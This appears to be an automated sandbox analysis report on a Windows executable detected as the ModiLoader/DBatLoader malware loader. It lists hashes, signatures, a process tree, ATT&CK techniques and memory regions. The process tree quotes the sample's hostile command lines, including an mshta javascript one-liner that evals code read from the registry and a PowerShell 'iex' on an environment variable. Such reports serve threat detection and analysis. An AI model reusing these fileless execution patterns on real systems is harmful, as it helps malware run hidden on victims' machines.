Analysis

  • max time kernel
    142s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-05-2024 12:14

General

  • Target

    59fb67ea0ea32f96acc3b0487f3fa0b7_JaffaCakes118.exe

  • Size

    345KB

  • MD5

    59fb67ea0ea32f96acc3b0487f3fa0b7

  • SHA1

    b58cceda89db13e73dc7a7b8d11bc5cc53359094

  • SHA256

    e042a76361ec86ae101e9c338fb6165945a9550febf6eaebe6d40ccdee6a146e

  • SHA512

    dc5b34422ad1ac73c475bda56fabc991b82db799df6024f7009fbd4e89c731d33bfd8c49900136f9c41d091b70fe5addebed62fda265b708291a05dd8c467128

  • SSDEEP

    6144:pQUfThSSa/BpPEsOPDXBD/TlfGtk3wfCGovFpOmx+M59OTU4Q+IH/AXYO0Ip+u5F:O6FIBpPxuXBXREk3wfCGqwW+8O44gfA7

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\59fb67ea0ea32f96acc3b0487f3fa0b7_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\59fb67ea0ea32f96acc3b0487f3fa0b7_JaffaCakes118.exe"
    1⤵
      PID:1304
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:cPHD8="9";w3P=new%20ActiveXObject("WScript.Shell");t96Ybe="uhU";DlcB10=w3P.RegRead("HKCU\\software\\WAOBzM\\MvHNa4dW0");Q0wjK="llJA";eval(DlcB10);b54gRRLi="Ne6qUI";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:eiilpx
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1532
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:4956

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xgvuhawo.bap.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1304-13-0x0000000000456000-0x0000000000458000-memory.dmp
        Filesize

        8KB

      • memory/1304-7-0x00000000021F0000-0x00000000022CC000-memory.dmp
        Filesize

        880KB

      • memory/1304-1-0x0000000000400000-0x000000000045E780-memory.dmp
        Filesize

        377KB

      • memory/1304-4-0x00000000021F0000-0x00000000022CC000-memory.dmp
        Filesize

        880KB

      • memory/1304-2-0x0000000000400000-0x000000000045E780-memory.dmp
        Filesize

        377KB

      • memory/1304-6-0x00000000021F0000-0x00000000022CC000-memory.dmp
        Filesize

        880KB

      • memory/1304-5-0x00000000021F0000-0x00000000022CC000-memory.dmp
        Filesize

        880KB

      • memory/1304-8-0x00000000021F0000-0x00000000022CC000-memory.dmp
        Filesize

        880KB

      • memory/1304-10-0x00000000021F0000-0x00000000022CC000-memory.dmp
        Filesize

        880KB

      • memory/1304-0-0x0000000000456000-0x0000000000458000-memory.dmp
        Filesize

        8KB

      • memory/1304-3-0x00000000021F0000-0x00000000022CC000-memory.dmp
        Filesize

        880KB

      • memory/1532-17-0x0000000004E60000-0x0000000005488000-memory.dmp
        Filesize

        6.2MB

      • memory/1532-18-0x0000000004CE0000-0x0000000004D02000-memory.dmp
        Filesize

        136KB

      • memory/1532-20-0x0000000005490000-0x00000000054F6000-memory.dmp
        Filesize

        408KB

      • memory/1532-21-0x0000000005570000-0x00000000055D6000-memory.dmp
        Filesize

        408KB

      • memory/1532-15-0x00000000046B0000-0x00000000046E6000-memory.dmp
        Filesize

        216KB

      • memory/1532-31-0x00000000055E0000-0x0000000005934000-memory.dmp
        Filesize

        3.3MB

      • memory/1532-33-0x0000000005A80000-0x0000000005A9E000-memory.dmp
        Filesize

        120KB

      • memory/1532-34-0x0000000005B60000-0x0000000005BAC000-memory.dmp
        Filesize

        304KB

      • memory/1532-35-0x0000000007210000-0x000000000788A000-memory.dmp
        Filesize

        6.5MB

      • memory/1532-36-0x0000000006BC0000-0x0000000006BDA000-memory.dmp
        Filesize

        104KB